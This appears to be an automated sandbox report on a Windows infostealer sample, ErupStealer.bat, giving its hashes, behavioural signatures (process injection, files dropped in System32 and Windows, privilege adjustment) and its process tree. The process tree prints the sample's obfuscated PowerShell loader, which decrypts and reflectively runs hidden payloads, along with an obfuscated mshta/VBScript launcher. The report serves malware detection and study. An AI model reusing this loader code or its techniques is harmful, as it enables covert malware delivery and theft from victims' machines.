Resubmissions
21/09/2023, 15:27
230921-svygqaha21 721/09/2023, 15:23
230921-ssx36sgh9y 1021/09/2023, 15:12
230921-sley1sah53 1021/09/2023, 15:08
230921-sh3wnsgh5v 10Analysis
-
max time kernel
26s -
max time network
20s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
21/09/2023, 15:23
Static task
static1
Behavioral task
behavioral1
Sample
ErupStealer.bat
Resource
win10-20230915-en
General
-
Target
ErupStealer.bat
-
Size
14.6MB
-
MD5
9644bf6130818a23b7820e4441d84d6a
-
SHA1
654d821a794488acba87a809e8eab889eb9845db
-
SHA256
050efb70d521f74a42dcd63c703900433b03cf138fcfa1812705c8cb37deb1ea
-
SHA512
db83473f76f680fa8f93da5bfa71d2b396f4cef44d222e75430a09432c68b67e37c92ca56b7f5d54265cbbb44145df00a11ccf89c498a391af609a2976c6beb9
-
SSDEEP
49152:VfcOj5SiJ6+FBW/rRNkFa34CG36ICLvbtSAKsASfycGoA+uVteH7ki8KjXtXH8xU:u
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4112 created 588 4112 ErupStealer.bat.exe 4 -
Executes dropped EXE 1 IoCs
pid Process 4112 ErupStealer.bat.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\vcruntime140_1d.dll ErupStealer.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll ErupStealer.bat.exe File created C:\Windows\System32\ucrtbased.dll ErupStealer.bat.exe File created C:\Windows\System32\vcruntime140_1d.dll ErupStealer.bat.exe File created C:\Windows\System32\vcruntime140d.dll ErupStealer.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll ErupStealer.bat.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4112 set thread context of 4424 4112 ErupStealer.bat.exe 75 PID 4112 set thread context of 4192 4112 ErupStealer.bat.exe 76 -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\$sxr-powershell.exe ErupStealer.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe ErupStealer.bat.exe File created C:\Windows\$sxr-mshta.exe ErupStealer.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe ErupStealer.bat.exe File created C:\Windows\$sxr-cmd.exe ErupStealer.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe ErupStealer.bat.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4112 ErupStealer.bat.exe 4112 ErupStealer.bat.exe 4112 ErupStealer.bat.exe 4112 ErupStealer.bat.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4424 dllhost.exe 4192 dllhost.exe 4192 dllhost.exe 4192 dllhost.exe 4192 dllhost.exe 4112 ErupStealer.bat.exe 4112 ErupStealer.bat.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4112 ErupStealer.bat.exe Token: SeDebugPrivilege 4112 ErupStealer.bat.exe Token: SeDebugPrivilege 4424 dllhost.exe Token: SeDebugPrivilege 4192 dllhost.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2828 wrote to memory of 4252 2828 cmd.exe 71 PID 2828 wrote to memory of 4252 2828 cmd.exe 71 PID 4252 wrote to memory of 392 4252 net.exe 72 PID 4252 wrote to memory of 392 4252 net.exe 72 PID 2828 wrote to memory of 4112 2828 cmd.exe 73 PID 2828 wrote to memory of 4112 2828 cmd.exe 73 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4424 4112 ErupStealer.bat.exe 75 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 PID 4112 wrote to memory of 4192 4112 ErupStealer.bat.exe 76 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ff1e438-5ff3-4a5f-b987-05b6eb494b3b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat.exe"ErupStealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mwWOh($uwovJ){ $lIKee=[System.Security.Cryptography.Aes]::Create(); $lIKee.Mode=[System.Security.Cryptography.CipherMode]::CBC; $lIKee.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $lIKee.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4/MHVPOJNXCgMmApeZ/aW7DfvfpDsQu0DAqCZk9AP30='); $lIKee.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GRBc4aBzawKiY1avi58oMw=='); $epLsM=$lIKee.CreateDecryptor(); $return_var=$epLsM.TransformFinalBlock($uwovJ, 0, $uwovJ.Length); $epLsM.Dispose(); $lIKee.Dispose(); $return_var;}function XhrFJ($uwovJ){ $kffSF=New-Object System.IO.MemoryStream(,$uwovJ); $YpnXE=New-Object System.IO.MemoryStream; $ynBsy=New-Object System.IO.Compression.GZipStream($kffSF, [IO.Compression.CompressionMode]::Decompress); $ynBsy.CopyTo($YpnXE); $ynBsy.Dispose(); $kffSF.Dispose(); $YpnXE.Dispose(); $YpnXE.ToArray();}function btWsM($uwovJ,$rQWkL){ $vcWOa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$uwovJ); $Zagwh=$vcWOa.EntryPoint; $Zagwh.Invoke($null, $rQWkL);}$chsAO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat').Split([Environment]::NewLine);foreach ($YTXXB in $chsAO) { if ($YTXXB.StartsWith('SEROXEN')) { $GBpWW=$YTXXB.Substring(7); break; }}$kYJLl=[string[]]$GBpWW.Split('\');$BbRnn=XhrFJ (mwWOh ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kYJLl[0])));$IqrGF=XhrFJ (mwWOh ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kYJLl[1])));btWsM $IqrGF (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));btWsM $BbRnn (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{df002af6-79f6-48e3-a023-f921f23c46a7}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ghkpOQAYRIzJOVXtopMV4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵PID:224
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4